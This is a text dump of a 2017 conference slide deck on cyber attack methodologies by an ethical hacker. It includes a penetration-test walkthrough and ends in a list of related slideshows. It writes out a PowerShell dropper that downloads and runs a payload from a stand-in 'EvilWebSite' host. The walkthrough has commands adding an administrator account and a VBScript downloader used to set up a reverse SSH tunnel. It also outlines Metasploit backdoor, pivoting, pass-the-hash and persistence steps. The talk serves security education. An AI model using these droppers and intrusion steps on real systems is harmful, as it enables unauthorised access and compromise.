SlideShare une entreprise Scribd logo

Cyber Attack Methodologies

Geeks Anonymes
Geeks Anonymes

Présentation aux Geeks Anonymes Liège par Frédéric De Pauw, le 29 novembre 2017

Internet
1  sur  65
Télécharger pour lire hors ligne
Cyber Attacks Methodologies 29-11-2017 Geeks Anonymes
1. Objectives 2. Introduction 3. Cyber Attack Lifecycle 4. Vulnerabilities and Exploitation 5. Social Engineering and Advanced Persistent Threats 6. Example of a penetration test scenario 7. Conclusion
Introduction
Introduction  Frédéric De Pauw  Cyber Security specialist & ethical hacker Head Security Services @NRB Freelance Ethical Hacker (BE – LUX – US) https://be.linkedin.com/in/fdepauw
Introduction  What is Cyber Crime?  Computer crime, or cybercrime, is crime that involves a computer and a network  Two types of Cyber Crime:  Technology is the Target. Enterprise, State systems, personal systems  Technology is the Instrument. Criminal activities on Internet  This session is focused on the first type
Introduction Technology = Target Technology = instrument Distributed Deny of Service Pedopornography Hacking incitement to racial hatred Malwares, Ransomwares Incitement to terrorism Phishing Money Laundering Hacktivism Drug sell … Spam …
Introduction  Cyber Crime  Drastically evolved over the past years, following the global evolution of ICT supporting human activity  Allow cyber criminals to make profit equivalent as other types of criminality  Offers some advantages over other criminal activities: anonymity, discretion, borderless  Remain little fought and with no international legislation  Has evolved to cyber war with state-sponsored attacks  Will affect our life (connected cars, Operational Technologies, IOT)  Cost of Cyber Crime in Belgium: 3,5 billion Euros
Introduction Evolution of Cyber Crime S O P H I S T I C A T I O N 1985-1995 Entertainmen t First Worms Phone Hacking 2010-2017-… Hacktivism Virus Spread Website Defacement Organized Crime DDOS Company Systems Hacking Data Lead Industrial espionage Cyber War Targeted Attacks State-Sponsored Attacks
Introduction Cyber War – NSA Hacking Tools Leak (2017) 2. NSA Contractor installs trojan 3. NSA Contractor runs full scan 1. NSA Contractor has NSA Hacking tools on his PC 4. Kaspersky AV discovers malware + NSA hacking tools 5. Russian spies are somehow aware of the discovery of NSA tools Kaspersky Denies giving info 6. Russian Spies further Hack contractor PC
Introduction Cyber War – NSA Hacking Tools Leak
Introduction  Future of Cyber Crime  Intensification of targeted cyber attacks against enterprises with important impacts (financial, image..)  Predominance of Advanced Persistence Threats targeting the end user  99% of System Compromises will still use unpatched Vulnerabilities  Intensification of cyber war / cyber espionage activities between nations  Increase of cyber crime targeting connected objects and operational technologies  MIRA botnet – 2017  Hackable Cardiac devices – 2017  WIFI Baby Heat Monitor device -2017  Jeep SUV Hack - 2015
Introduction  Legal evolution  General Data Protection Regulation (GDPR) – adopted end of 2016 – comes into force 25 may 2018  Circulars of National Bank of Belgium  Regulation for financial sector  Data Breach notification standard  Within 72 hours  Fines in case of data leak  Max 4% of turnover, maximum 20 M€
Cyber Attack Life Cycle
Cyber Attack Lifecycle - Public Information - Social Networks - Vulnerability Scanning - Physical Observation 1 Reconnaissance 2 Initial Infection - Vulnerabilities - Virus / Malware - Social Engineering - Physical Intrusion 3 Gain Control 4 Privilege Escalation Control infected system 5 Lateral Movement Compromise more systems deeper in the network 7 Malicious Activities Data Exfiltration Hacking Websites Money Extortion ..Gain elevated privileges on the infected system 6 Persistence Maintain persistent connection with infected systems
Cyber Attack Lifecycle > Reconnaissance  Reconnaissance process is a key activity  Indeed, during this phase crucial information are obtained in order to perform a cyber attack  For instance, information will be used to determined the best attack vector to be used  Activities performed are:  Collect information concerning the target (websites, telephone numbers, general mailboxes..) through public information  Collect information through direct contact sur as phone calls (fake poll, job seeker..)  Collect technical information concerning the target information system (exposed systems, partners, data centers..)  Collect information on premises (garbage, WIFI scanning..)  Actively scan enterprise networks exposed on Internet
Cyber Attack Lifecycle > Reconnaissance
Cyber Attack Lifecycle > Reconnaissance  Following reconnaissance activities, attackers must have obtained enough information in order to determine best attack vectors in order to perform the initial infection phase  For instance:  Vulnerabilities infecting systems exposed on Internet  Lack of physical access to facilities  Social engineering attack on selected profiles from, for instance, social networks information
Cyber Attack Lifecycle > Initial Infection  Initial Infection is aimed at obtaining a first backdoor within the target information system  Vectors:  Exploiting a vulnerability affecting the victim’s system(s)  Infection through Virus / Malware  Exploiting a physical vulnerability
Cyber Attack Lifecycle > Initial Infection PerimeterPublic Cloud Private Cloud Corporate Network On Prem Applications Servers / Appliances Security Technology SAAS Applications Servers / Appliances Security Technology Corporate Applications Servers / Appliances Security Technology Corporate Applications Servers / Appliances Security Technology End Users
Cyber Attack Lifecycle > Initial Infection
Cyber Attack Lifecycle > Initial Infection  IDS/IPS Bypass  Encryption  Anti-Virus Bypass  Use simple Powershell as a dropper which fetches an encrypted payload over Internet  powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt '))  Unknown Viruses  Use Staging to decouple payload from initial dropper.  The dropper is injected directly into memory  Fileless malware infection  Firewall Bypass  Uses “reverse” connections which connect to the C&C  E.g. HTTPS passing through the Enterprise Proxy
Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Create Powershell Payload
Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Move Payload to evil Web Server
Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Create the « Dropper »
Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Start the Listener
Cyber Attack Lifecycle > Gain Control  Once initial infection is performed, the objective is to get control over the machine.  For this a network connection must be established between the victim and the Command & Control Server  In general « reverse » connection is made to bypass inbound Firewall protection  Several techniques to bypass Outbound filtering (if present.)
Cyber Attack Lifecycle > Gain Control  Standard Enterprise security principles for Outbound filtering:  Default policy is to deny all outbound connections  Allowed outbound connections must go through a proxy  Outbound connections must conform to the expected protocol  Outbound connections must pass other checks as well.  Outbound filtering evasion techniques examples  Reverse HTTP and / or HTTPS traffic (without or with Proxy settings verification  Payload Staging over DNS by setting the payload into TXT Records of a Domain
Cyber Attack Lifecycle > Gain Control  Metasploit / Meterpreter  Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Cyber Attack Lifecycle > Privilege Escalation  Escalate privileges from infected machines in order gain elevated access  Typical example is getting Administrator privileges  Several techniques  « Local Exploits » from local applications on the infected machine  Manual search for credentials in scripts  Password Hashes dump (e.g. SAM, /etc/passwd) and cracking  Authenticated Sessions grabbing (e.g. VPN Sessions)  LSASS Process Dump (MimiKatz)  SSH Keys  World Writeable files  Read command history files  Batches / Jobs alteration  Process Injection  Try injecting malicious code in processes running under « Domain Admin » privileged user
Cyber Attack Lifecycle > Privilege Escalation  Metasploit: « Incognito » module  Allows to impersonate authentication tokens on compromised windows hosts  Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens  TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts
Cyber Attack Lifecycle > Lateral Movement  From Infected systems, try to infect more systems deeper in the Network  Basically repeat the cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)  Aim for high value systems, windows domain controllers, file servers..  Techniques  Credential re-use / pass-the-hash / SSH keys re-use  Internal applications vulnerabilities (less often patched)  Network segmentation issues between environments ( e.g. Port 445) – PsExec with Pass-The-Hash
Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems
Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Use Autoroute to make the compromised host a pivot to other networks
Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Scan the network through the route created on ports 139 & 445
Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Start a new session on a new host using PsExec and “Pass-The- Hash” technique re-using local Administrator password hash
Cyber Attack Lifecycle > Maintain Persistence  Prevent loss of connection between infected machines and the C&C  Techniques  Create jobs / schedule tasks  Create service running on startup  Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)  Bootkit / Rootkit  Default file association  Logon Scripts  Modification of Applications / Services  Registry RUN keys
Cyber Attack Lifecycle > Maintain Persistence  Metasploit / Persistence module  Create a Meterpreter service which will start when the compromised host boots
Cyber Attack Lifecycle > Maintain Persistence  Metasploit / Persistence module  Create a Meterpreter service which will start when the compromised host boots
Cyber Attack Lifecycle > Demo  Social Engineering scenario  Send a « Virus » to the victim which consists of a Metasploit Meterpreter instance  Undetected by up to date commercial antivirus 1. Prepare Malware & environment 2. Send Malware 3. Execute Malware 4. Get infected & Contact C&C 5. Interact
Vulnerabilities and Exploitation
Vulnerabilities and Exploitation  A vulnerability is a flaw in a system which allows a malicious user to compromise its Confidentiality, Integrity and / or its availability  Simple – Default Password. Complex – Buffer Overflow in an application  Dozens of new vulnerabilities officially classified everyday  http://www.cvedetails.com  Dozen of others are not disclosed!  0DAY – Vulnerabilities not discovered, or not disclosed  Vulnerabilities are discovered by  Researchers, students (Ethical Hackers)  Professional researchers ( Vulnerability Brokers )  http://www.zerodayinitiative.com/  France- Vupen Security – Sells vulnerabilities to NASA  Cyber Criminals( 0DAYS )
Vulnerabilities and Exploitation  Full Disclosure principle  Vulnerabilities are reported and published publicly as soon as discovered without taking into account that a patch is available  Responsible disclosure principle  Vendors are notified first  Vulnerability is publicly disclosed after 45 days  Websites with vulnerabilities and associated exploits  www.securityfocus.com  www.1337day.com (not free)  http://www.cvedetails.com/  http://www.exploit-db.com/  Underground Websites on TOR network  Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR) ccc.de (ALL), blackhat.com (US)
Vulnerabilities and Exploitation HTTPS://0day.today/
Vulnerabilities and Exploitation  Complexity of systems, applicative codes, communication flows, network segmentation  Out-of-the-box vulnerabilities of Vendor solutions, lack of security configuration  Next->Next->Next Syndrome  Lack of secure coding awareness  TOP 10 OWASP  Lack of enforcement for Security during IT Projects  Security implies Cost and Time  Need for functionality <-> Need for security  BlackList Mode  Learning Mode
Social Engineering and Advanced Persistent Threats
Human Vulnerabilities / Social Engineering Social engineering is the preferred attack vector as it is generally easier to bypass preventive security measures Targets can be the company employees but also partners / subcontractors Two types of social engineering: Human SE Technical SE
Human Vulnerabilities / Social Engineering Technical SE is aimed at compromising end user systems Transmission of the malware follows « authorized » routes, such as e- mail and/or web browsing Bypass security measures such as perimeter security, firewalls,.. 1. INFECTION 2. CONTROL
Human Vulnerabilities / Social Engineering Attack methodologies: Encourage users to install tools such as « TeamViewer » or « LogMeIn » Send malware through e-mail Word/Excel with malicious Macros PDF files exploiting PDF vulnerabilities Send mail containing links to malicious web sites Send Phishing SMS on Smartphones (SMShing) Drop USB Keys containing Viruses (STUXNET) USB Gadgets configured to simulate a Keyboard
Human Vulnerabilities / Social Engineering Nowadays systems are in general protected against USB Infection through autorun functionality New method -> « Hacker Interface Devices » Attackers embed malicious code within USB Gadgets Once connected, those gadgets simulate being a keyboard and start sending commands to the computer (Keystroke Injection) Those commands can drop a malware as easily as other techniques Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe USB Gadgets
Penetration test example
Penetration test example Context: Black Box Intrusion test. Scope: External- facing systems Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’EntrepriseInternal Network
Penetration test example VULN 1/2: Vulnerable deployment of SAP BO ( Apache Axis2 ) CVE-2010-0219 , Apache Axis2 Default Credentials http://www.securityfocus.com/bid/40343 , Apache Axis2 Directory traversal See earlier: Vuln « Directory Traversal » Vuln « Default Password » Allows to have admin credentials to Axis2
Penetration test example
Penetration test example Access to Axis2 administration allows to upload a Web Service and LIVE deployment of it
Penetration test example A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects Authenticated Code Execution http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer We use it to deploy a reverse shell backdoor on the server to connect back to port 80 VULN 3: Servers is allowed to contact any host on Internet on port 80 and 443 Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’Entreprise C&C SERVER – PORT 80 Port 80 Internal Network
Penetration test example Not possible to upload a meterpreter (killed by AV on the machine) Possible to upload a backdoor which sends me back a DOS command prompt on the server
Penetration test example Next steps: Create privileged account on the server VULN 4: Application server is running under ADMIN privileges Net user temptest password /add Net localgroup Administrators hacked /add Obtain a Remote Desktop connection Problem: Port 3389 closed Inbound Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389 Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443
Penetration test example To create the tunnel, I need to download a SSH Client on the Server using DOS command prompt I create a VBSCRIPT script using « Echo » command, then execute the VBSCRIPT Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs Cscript dl.vbs Use plink to create the tunnel dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "http://www.putty.com/plink.exe", False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile "c:tempplink.exe", 2 '//overwrite end with
Penetration test example Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443  Connect to RDP through the tunnel and use the user account I just created to connect temptest password
Penetration test example  Next Step -> Lateral Movement – the simplest first, credentials reuse  I need to crack all passwords present locally on the infected server  Vuln 6/7: Windows 2003 Design Vulnerabilities  VULN 6: « Repair » file contains a SAM backup file containing encrypted credentials using LMHASH  VULN: LMHASH encryption algorithm is broken and can be cracked easily
Penetration test example  After some minutes
Penetration test example  VULN 8: Local Administrator password is replicated over all systems in the DMZ Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443 Web Servers Web Servers Web Servers Port 3389
Penetration test example  Next-Step: Try to hit Internal Network  VULN 9 : DMZ Systems members of Internal Windows Domain. Means that critical ports ( e.g. 139, 445, … ) must be open between DMZ and Internal network  VULN 10 : Password Replication Bis – A Domain Admin user account whose name is identical has a local account has the same password
Penetration test example  I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and has full control over the Enterprise Domain Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’Entreprise Contrôleur de Domaine Domain Controller
Conclusion

Recommandé

Cybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecurityCybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecuritysommerville-videos
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
Cybersecurity
CybersecurityCybersecurity
CybersecurityEdwin A. Opare
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Vulnerability Management
Vulnerability ManagementVulnerability Management
Vulnerability Managementasherad
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...Edureka!
 

Recommandé

Cybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecurityCybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecuritysommerville-videos
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
Cybersecurity
CybersecurityCybersecurity
CybersecurityEdwin A. Opare
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Vulnerability Management
Vulnerability ManagementVulnerability Management
Vulnerability Managementasherad
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...Edureka!
 
Anatomy of a cyber attack
Anatomy of a cyber attackAnatomy of a cyber attack
Anatomy of a cyber attackMark Silver
 
Cyber security
Cyber securityCyber security
Cyber securityBhavin Shah
 
Cyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceCyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceTom K
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101Jannis Kirschner
 
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...Edureka!
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainSuwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
Vulnerability and Patch Management
Vulnerability and Patch ManagementVulnerability and Patch Management
Vulnerability and Patch Managementn|u - The Open Security Community
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityKrutarth Vasavada
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
CYBER SECURITY
CYBER SECURITYCYBER SECURITY
CYBER SECURITYMohammad Shakirul islam
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical HackingKeith Brooks
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023PECB
 
SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1Priyanka Aash
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsLearningwithRayYT
 
Social engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorSocial engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorJames Krusic
 
Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)hardik soni
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligencemohamed nasri
 
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...wajug
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking pptSHAHID ANSARI
 

Contenu connexe

Tendances

Anatomy of a cyber attack
Anatomy of a cyber attackAnatomy of a cyber attack
Anatomy of a cyber attackMark Silver
 
Cyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceCyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceTom K
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101Jannis Kirschner
 
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...Edureka!
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityKrutarth Vasavada
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023PECB
 
SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1Priyanka Aash
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsLearningwithRayYT
 
Social engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorSocial engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorJames Krusic
 
Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)hardik soni
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligencemohamed nasri
 

Tendances (20)

Anatomy of a cyber attack
Anatomy of a cyber attackAnatomy of a cyber attack
Anatomy of a cyber attack
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceCyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General Audience
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
 
Vulnerability and Patch Management
Vulnerability and Patch ManagementVulnerability and Patch Management
Vulnerability and Patch Management
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
CYBER SECURITY
CYBER SECURITYCYBER SECURITY
CYBER SECURITY
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023
 
SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack Vectors
 
Social engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorSocial engineering-Attack of the Human Behavior
Social engineering-Attack of the Human Behavior
 
Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 

Similaire à Cyber Attack Methodologies

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...wajug
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking pptSHAHID ANSARI
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking pptSHAHID ANSARI
 
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingThe Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingMuhammad FAHAD
 
3 Hkcert Trend
3 Hkcert Trend3 Hkcert Trend
3 Hkcert TrendSC Leung
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersSomyos U.
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hackingAnumadil1
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
 
Final report ethical hacking
Final report ethical hackingFinal report ethical hacking
Final report ethical hackingsamprada123
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
certified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdfcertified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdfinfosec train
 
certified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_contentcertified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_contentpriyanshamadhwal2
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 

Similaire à Cyber Attack Methodologies (20)

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
Mim Attack Essay
Mim Attack EssayMim Attack Essay
Mim Attack Essay
 
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingThe Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
3 Hkcert Trend
3 Hkcert Trend3 Hkcert Trend
3 Hkcert Trend
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security Perimeters
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
